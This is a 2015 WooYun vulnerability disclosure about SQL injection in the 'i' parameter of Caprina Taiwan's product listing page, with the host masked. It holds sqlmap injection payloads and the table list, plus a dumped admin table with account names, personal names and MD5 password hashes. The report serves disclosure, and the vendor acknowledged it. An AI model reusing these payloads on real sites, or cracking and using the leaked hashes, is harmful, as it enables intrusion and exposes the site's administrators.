当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165856

漏洞标题:Caprina 肯拿士台灣官方網站存在SQL注入(臺灣地區)

相关厂商:Caprina 肯拿士台灣官方網站

漏洞作者: 路人甲

提交时间:2015-12-30 18:01

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-30: 细节已通知厂商并且等待厂商处理中
2015-12-31: 厂商已经确认,细节仅向厂商公开
2016-01-10: 细节向核心白帽子及相关领域专家公开
2016-01-20: 细节向普通白帽子公开
2016-01-30: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

详细说明:

Caprina 肯拿士台灣官方網站存在SQL注入
aprina肯拿士產品以新鮮純淨的山羊奶滋瀾你的肌膚,是最棒的天然保溼劑,也是為使用者帶來好氣色與好心情的祕密配方。
注入点:http://**.**.**.**/product_list.php?i=1

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: i (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: i=1 AND 3598=3598
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: i=1 AND (SELECT 8960 FROM(SELECT COUNT(*),CONCAT(0x716b786b71,(SELECT (ELT(8960=8960,1))),0x717a7a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: i=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ErnH)
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current user: '[email protected].%'
current database: 'DBL02554'
current user is DBA: False
available databases [2]:
[*] DBL02554
[*] information_schema


Database: DBL02554
+------------------+---------+
| Table | Entries |
+------------------+---------+
| admin_log | 157 |
| news_album | 44 |
| product_album | 41 |
| faq_album | 22 |
| member_album | 8 |
| product_kind_sub | 8 |
| web_album | 8 |
| admin_block | 7 |
| channel_album | 7 |
| admin | 3 |
| product_kind | 2 |
+------------------+---------+


Table: admin
[9 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| level | int(1) |
| a_id | bigint(1) |
| account | varchar(20) |
| email | varchar(200) |
| lastdate | datetime |
| name | varchar(10) |
| pwd | varchar(60) |
| que | int(3) |
| statu | int(1) |
+----------+--------------+
Database: DBL02554
Table: admin
[3 entries]
+------+-------------------------------------+-----+---------+-------+------------------------+---------+---------+---------------------+
| a_id | pwd | que | name | statu | email | level | account | lastdate |
+------+-------------------------------------+-----+---------+-------+------------------------+---------+---------+---------------------+
| 1 | 987a7bec28f18f4ec07777294855266d | 1 | 里歐 | 2 | leoyeh@**.**.**.** | 1 | leoyeh | 2013-06-11 00:04:36 |
| 2 | 5768d3c648f6569bd08ac218cc106d88 | 0 | Caprina | 1 | caprina@**.**.**.** | 2 | admin | 2015-12-22 13:59:21 |
| 3 | d41d8cd98f00b204e9800998ecf8427e () | 0 | Aaa as | 2 | Zzz | 2 | Zzz | 2013-05-29 08:38:01 |
+------+-------------------------------------+-----+---------+-------+------------------------+---------+---------+---------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-12-31 02:52

厂商回复:

感謝通報

最新状态:

暂无